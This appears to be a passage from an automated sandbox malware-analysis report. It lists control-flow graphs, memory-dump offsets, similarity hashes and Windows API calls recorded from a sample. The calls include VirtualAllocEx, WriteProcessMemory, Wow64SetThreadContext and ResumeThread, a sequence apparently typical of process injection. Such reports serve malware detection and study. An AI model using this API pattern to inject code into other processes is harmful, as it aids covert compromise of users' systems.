                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00B759C9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1777867522.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_b70000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: 77a5f920e69a0c9bf45eed910163104454f05b5767277e5e764f63408e138de9
                                                                                                            • Instruction ID: 19aeb3572d17f0a7bd0d9e2ff915e5d171cc55890278ff0fcf8b4b24651591e4
                                                                                                            • Opcode Fuzzy Hash: 77a5f920e69a0c9bf45eed910163104454f05b5767277e5e764f63408e138de9
                                                                                                            • Instruction Fuzzy Hash: CE41D2B4C00619CBDB24CFA9C884A9EBBF5BF48304F2481AAD419AB255DBB56945CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 770 b7590c-b75913 771 b7591c-b759d9 CreateActCtxA 770->771 773 b759e2-b75a3c 771->773 774 b759db-b759e1 771->774 781 b75a3e-b75a41 773->781 782 b75a4b-b75a4f 773->782 774->773 781->782 783 b75a51-b75a5d 782->783 784 b75a60 782->784 783->784 786 b75a61 784->786 786->786
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00B759C9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1777867522.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_b70000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: 1064ddeed7b16178b20f3d80b1e2a7797174564116f76a71582879bdeeb5f9ba
                                                                                                            • Instruction ID: 3c4484926825c82c2d0a7cd4bdf1f19773ed1ad499e9ddc6b6b23b9203e94b20
                                                                                                            • Opcode Fuzzy Hash: 1064ddeed7b16178b20f3d80b1e2a7797174564116f76a71582879bdeeb5f9ba
                                                                                                            • Instruction Fuzzy Hash: 0841F2B4C00719CEDB24CFA9C8847CDBBF5BF48304F2480AAD418AB255DBB56946CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 787 4bf4050-4bf408c 788 4bf413c-4bf415c 787->788 789 4bf4092-4bf4097 787->789 796 4bf415f-4bf416c 788->796 790 4bf40ea-4bf4122 CallWindowProcW 789->790 791 4bf4099-4bf40d0 789->791 792 4bf412b-4bf413a 790->792 793 4bf4124-4bf412a 790->793 797 4bf40d9-4bf40e8 791->797 798 4bf40d2-4bf40d8 791->798 792->796 793->792 797->796 798->797
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 04BF4111
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1782467142.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: 726effb178d168c59968a461410d6820ac333c6d3304fccc055498fa86f4a0c6
                                                                                                            • Instruction ID: 9bafcfc764bc14ac92a0c2902d4df1112d4cf7a58523917b0ea8c50bc0c93f22
                                                                                                            • Opcode Fuzzy Hash: 726effb178d168c59968a461410d6820ac333c6d3304fccc055498fa86f4a0c6
                                                                                                            • Instruction Fuzzy Hash: BF4115B9A003058FCB14CF99C848AABBBF5FB98314F24C499D519AB321D774A945CFA0

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 801 6abb6a0-6abb6f6 803 6abb6f8-6abb704 801->803 804 6abb706-6abb745 WriteProcessMemory 801->804 803->804 806 6abb74e-6abb77e 804->806 807 6abb747-6abb74d 804->807 807->806
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ABB738
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 8f7a14a6c96171336763665449a126bd2778323436e1061ba69c60c4512397a6
                                                                                                            • Instruction ID: dec2cc6b8df56c553adfd7911dbcbc36c7aed09eab1a8b67ef2b806adcbcbfb7
                                                                                                            • Opcode Fuzzy Hash: 8f7a14a6c96171336763665449a126bd2778323436e1061ba69c60c4512397a6
                                                                                                            • Instruction Fuzzy Hash: 912189B59013499FCB10DFA9C885BEEBBF5FF88314F10842EE858A7241C7789944CBA0
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ABB738
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 4f4727ed4a480cfe317e9f7f71c072a06fdd18832230c9122c4bb744b072125d
                                                                                                            • Instruction ID: 7273d2f1068028db2412aac6b424f9a9082b6b59c9019b4b4a06392923554145
                                                                                                            • Opcode Fuzzy Hash: 4f4727ed4a480cfe317e9f7f71c072a06fdd18832230c9122c4bb744b072125d
                                                                                                            • Instruction Fuzzy Hash: A32136B59003599FCB10DFA9C885BDEBBF5FF48324F10842AE958A7251C7789984CBA4
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ABB156
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: 345a02b1143d8a23cce442269613f680b04855a78a9ab5ca29cf3af70b9d1681
                                                                                                            • Instruction ID: 88638ed4d139ebf2e6dcb1f3f01c36cb1af1fccfed8e686a76177cd7e20514da
                                                                                                            • Opcode Fuzzy Hash: 345a02b1143d8a23cce442269613f680b04855a78a9ab5ca29cf3af70b9d1681
                                                                                                            • Instruction Fuzzy Hash: DC2159B5D003099FCB10DFAAC885BEEBBF8EF88314F148429D459A7241CB789945CFA5
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ABB818
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: 941c5e3da5a4c1674efdaa04147d8dea41b303c0c2047abe99fa504e327bdbe0
                                                                                                            • Instruction ID: cc493aed94978bd4dd713414bb94a8a9cca5e94d08a9d227960547acdc473054
                                                                                                            • Opcode Fuzzy Hash: 941c5e3da5a4c1674efdaa04147d8dea41b303c0c2047abe99fa504e327bdbe0
                                                                                                            • Instruction Fuzzy Hash: F92148B5C003499FCB10DFAAC841AEEFBF5FF48320F108429E959A7250C7789944CBA5
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ABB818
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: 5873f755c58dd0494ccd8560ddb7aca026f013522131befa4e7b9544fc774ce4
                                                                                                            • Instruction ID: d2ace660a0818102e71e862380a753bdc552e06243bb7bb3643fcfa86f46d36d
                                                                                                            • Opcode Fuzzy Hash: 5873f755c58dd0494ccd8560ddb7aca026f013522131befa4e7b9544fc774ce4
                                                                                                            • Instruction Fuzzy Hash: 452137B5C003599FCB10DFAAC881AEEFBF5FF48320F10842AE558A7250C7789944CBA5
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ABB156
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: def30001c30f114986a5537cb93bf73f19fec973a4fcdcd947d55c014ebcc01b
                                                                                                            • Instruction ID: b6d59c3d9ab66060c4bc47dece1484cb194018e747a062abb29a1e02218d66cc
                                                                                                            • Opcode Fuzzy Hash: def30001c30f114986a5537cb93bf73f19fec973a4fcdcd947d55c014ebcc01b
                                                                                                            • Instruction Fuzzy Hash: F52149B5D003098FDB10DFAAC4857EEBBF4EF48324F148429D459A7241CB789944CFA5
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B7D747
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1777867522.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_b70000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 7713c23200944c1a04cdef5992f1828de7d8e5229d17b1dba9ee2c4b01f95a35
                                                                                                            • Instruction ID: 217d08c119614c501960a0eb1f31bf48d9689e36cbfb517510cda6e03900d1cc
                                                                                                            • Opcode Fuzzy Hash: 7713c23200944c1a04cdef5992f1828de7d8e5229d17b1dba9ee2c4b01f95a35
                                                                                                            • Instruction Fuzzy Hash: 4A21E3B59002599FDB10CFAAD584AEEBFF4EB48314F14845AE968A3211C378A944CF65
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B7D747
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1777867522.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_b70000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: de82df8db23c51d8557e11ebddd8d162ad79d684ea034b7298fe612f6b124daa
                                                                                                            • Instruction ID: afab8519c2fe866b5a490c267e7125db07d4eeafe92f8e553b1cf89f43e9bbb0
                                                                                                            • Opcode Fuzzy Hash: de82df8db23c51d8557e11ebddd8d162ad79d684ea034b7298fe612f6b124daa
                                                                                                            • Instruction Fuzzy Hash: 6021C4B59002589FDB10CF9AD584ADEBBF8EB48310F14845AE958A7350D374A944CFA5
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ABB656
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 8ae7fe60c158f9848f667d4d3b1c0db9631d1f1c1e40950b316a74b4e36805b6
                                                                                                            • Instruction ID: bb5e7cb9b9a0bb882eaf007ab9bca28a87a984dbc2d3e246541ee7427918a913
                                                                                                            • Opcode Fuzzy Hash: 8ae7fe60c158f9848f667d4d3b1c0db9631d1f1c1e40950b316a74b4e36805b6
                                                                                                            • Instruction Fuzzy Hash: E81156B59002499FCB10DFAAC845ADFFFF9EF88320F208419E559A7251CB75A940CFA5
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ABB656
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 99aaf7de85f4c83f0b938f7d583390a6cee257a724dc0269c9676591afc6ca43
                                                                                                            • Instruction ID: 2d0f66fab656b5cb406a632a8aef4a3f11a486224b41c04e3d93b375dcc39c19
                                                                                                            • Opcode Fuzzy Hash: 99aaf7de85f4c83f0b938f7d583390a6cee257a724dc0269c9676591afc6ca43
                                                                                                            • Instruction Fuzzy Hash: 311167B58002488FCB10DFAAC844BDEBFF5EF88320F108419E519A7250CB75A940CFA4
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: e02bfc0842dcd627e9b71594892a94d4f17022574b46938d4d7aff0892a26e20
                                                                                                            • Instruction ID: 0333ae395bdd219b79b8eb8a7b0790b91439a5591144706346876e5dff942335
                                                                                                            • Opcode Fuzzy Hash: e02bfc0842dcd627e9b71594892a94d4f17022574b46938d4d7aff0892a26e20
                                                                                                            • Instruction Fuzzy Hash: 041158B59002498FCB20DFA9C4447EEFFF5AB88324F20842ED059A7240CB79A544CFA5
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: 179b5fb3ac6ce1b7122f2805883689da68faa2f7cbfe875070e1a434619d8cd9
                                                                                                            • Instruction ID: 7ca7628209243132ae50b960d738a07dfb2b8542c748193b16100ca24869299d
                                                                                                            • Opcode Fuzzy Hash: 179b5fb3ac6ce1b7122f2805883689da68faa2f7cbfe875070e1a434619d8cd9
                                                                                                            • Instruction Fuzzy Hash: D7113AB5D002488FCB20DFAAC4457EEFBF8EB88324F208419D559A7250CB75A544CFA5
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ABE5C5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: e353c4e63014e2427abbaf26fcf418eac3dec34c2434e78e86fd3bf3bafea6a3
                                                                                                            • Instruction ID: c76cbc52629013958ba26c24165a54dea80e75dd6b3b8c7286759d2abb5f4d21
                                                                                                            • Opcode Fuzzy Hash: e353c4e63014e2427abbaf26fcf418eac3dec34c2434e78e86fd3bf3bafea6a3
                                                                                                            • Instruction Fuzzy Hash: 971103B9800348DFDB10DF9AC884BDEBBF8FB48324F108519E559A7601C375A944CFA5
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ABE5C5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 2cefec623c3c00bd9a229cd8ae59f2246a752bd748a274f951711303a103d810
                                                                                                            • Instruction ID: 068c7530396151009036b648e0382ece696496fa787b8d9b8a384700228f1207
                                                                                                            • Opcode Fuzzy Hash: 2cefec623c3c00bd9a229cd8ae59f2246a752bd748a274f951711303a103d810
                                                                                                            • Instruction Fuzzy Hash: 631103B9800348DFDB50DF9AC885BDEBBF8FB48324F108419E558A7601D375A944CFA5
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00B7B03E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1777867522.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_b70000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: b278490378e08d5bb4a07e31692a4450ac9d07f5fbcf9277fda61f8a91820417
                                                                                                            • Instruction ID: 80170022b5d384a081943539b161c54fee4dc39996bca62ff8244041b1e92110
                                                                                                            • Opcode Fuzzy Hash: b278490378e08d5bb4a07e31692a4450ac9d07f5fbcf9277fda61f8a91820417
                                                                                                            • Instruction Fuzzy Hash: A9110FB6C002498FCB10CF9AC444BDEFBF4EB88324F10846AD428A7210D379A545CFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1777082543.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_91d000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 31a4be63993d90325d53d40deaac2bf1e315d7e4bdf1dc17d4df8c62cbb54705
                                                                                                            • Instruction ID: 09be0f073459a91c1fff03751072925428ffea0f032eecb52c7822f99805ec9d
                                                                                                            • Opcode Fuzzy Hash: 31a4be63993d90325d53d40deaac2bf1e315d7e4bdf1dc17d4df8c62cbb54705
                                                                                                            • Instruction Fuzzy Hash: 3D213A71600208DFDB05DF14D9C0B67BF69FB98314F20C569E9094B2E6C33AE896C7A2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1777653569.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_b2d000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 668961aefed22b8d1a5eeb97d760e1fc9bfdc3912fc52cc258f1ec1f60b683a0
                                                                                                            • Instruction ID: a0677603087c8468413cfa77e3d49ab69c020dec91609f32ff5400c5017a9899
                                                                                                            • Opcode Fuzzy Hash: 668961aefed22b8d1a5eeb97d760e1fc9bfdc3912fc52cc258f1ec1f60b683a0
                                                                                                            • Instruction Fuzzy Hash: 0B212671604200EFDB05DF14E9C4B26BBE5FB88314F30CAADE80D4B296C33AD846CA61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1777653569.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_b2d000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3aac37bed2a54b84fb090d2422b70a0662a4acd9fc94686b3addd42011a50447
                                                                                                            • Instruction ID: 4a4f368cc8c923b414480a4da205a97561bbc74d0aa393485cfbbe216ff3d984
                                                                                                            • Opcode Fuzzy Hash: 3aac37bed2a54b84fb090d2422b70a0662a4acd9fc94686b3addd42011a50447
                                                                                                            • Instruction Fuzzy Hash: F921F271604240DFCB14DF14E9D4B27BBA5EB88314F20C6ADD94E4B2A6C33AD847CA61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1777653569.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_b2d000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f237d22cc1354dac667432c7e68c6af51ea7c616856e4ccb04d97cea2275550a
                                                                                                            • Instruction ID: 22407f998e189617e72028760317e4bb4ed8662aafefd3e07266fa17a96bb585
                                                                                                            • Opcode Fuzzy Hash: f237d22cc1354dac667432c7e68c6af51ea7c616856e4ccb04d97cea2275550a
                                                                                                            • Instruction Fuzzy Hash: AC21A4755083809FCB02CF14D994B12BFB1FB56314F28C5DAD8498F2A7C33A980ACB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1777082543.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_91d000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                            • Instruction ID: ec0a43661610c9b637ead3c7a68bed7b8d3b03d68d0ba26e1d7ccb5ab16fbf46
                                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                            • Instruction Fuzzy Hash: 07112672504244CFDB16CF00D5C4B56BF72FB94324F24C6A9DC090B2A6C33AE85ACBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1777653569.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_b2d000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                            • Instruction ID: ec06dfff73b3149921f8b3b16e2ed5fdadc9dd48790dfcee92b225b28e45a421
                                                                                                            • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                            • Instruction Fuzzy Hash: AE118B75504280DFDB16CF14D5C4B15BBA1FB84314F24C6AAD8494B696C33AD84ACB61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1777082543.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_91d000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 594652006e23eec179b6d7acb07cd49248f780c53982cf602483a950f289e02d
                                                                                                            • Instruction ID: 6ee00b0333c5b0d3d4a3d495d7d4b2fa2a9e47f1441a50019e8d5816dd1b2a57
                                                                                                            • Opcode Fuzzy Hash: 594652006e23eec179b6d7acb07cd49248f780c53982cf602483a950f289e02d
                                                                                                            • Instruction Fuzzy Hash: 0D01DBB120A3489AE7105E25CD84BA7FFDCDF45324F18C96AED194A2C6D679D880C6B1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1777082543.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_91d000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0db5f536e59d1dca327fec66d78a1e9c8f4b2e278723052e244b5f98b25a7d3b
                                                                                                            • Instruction ID: 3c179de3a7025b8f3061de62926cbcb2717c767d0bb386125711febcac1b24d1
                                                                                                            • Opcode Fuzzy Hash: 0db5f536e59d1dca327fec66d78a1e9c8f4b2e278723052e244b5f98b25a7d3b
                                                                                                            • Instruction Fuzzy Hash: B7F062B15093449EE7109E16D888BA2FFACEB55734F18C45AED085A286C2799884CAB1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2520b98c407918aa49ac4d684738ed64009b833da463b6c751ab7619b4488316
                                                                                                            • Instruction ID: e699a68d40ec61aa8fec88bc94fd119537ce08c08218fa4c0e558253984ba36c
                                                                                                            • Opcode Fuzzy Hash: 2520b98c407918aa49ac4d684738ed64009b833da463b6c751ab7619b4488316
                                                                                                            • Instruction Fuzzy Hash: F9D1C030B016448FDB99EB75C9507EEB7FAAF89300F1894ADD05ADB292CB35E901CB51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8d2ae20b4d55b930fa77e7f809dcfaa07aab8827899ebe5896d27d49f63d431d
                                                                                                            • Instruction ID: 15820e832bdda9ab629cc953f00e66cb506fc08d901be8a6f7a78ea3654f4e85
                                                                                                            • Opcode Fuzzy Hash: 8d2ae20b4d55b930fa77e7f809dcfaa07aab8827899ebe5896d27d49f63d431d
                                                                                                            • Instruction Fuzzy Hash: A3E14B74E002598FCB14DFA9C5809AEFBB6FF88304F24D169E415AB35AD734A941CFA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1782467142.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c60b6f27f09a03207a324be5e1d8db7ff1aa14b93cba29c6d18c7a943806a8af
                                                                                                            • Instruction ID: ceec75da0c9d7d87fddf9c308acf62887ee83c5c32930cc0405949bfc4752581
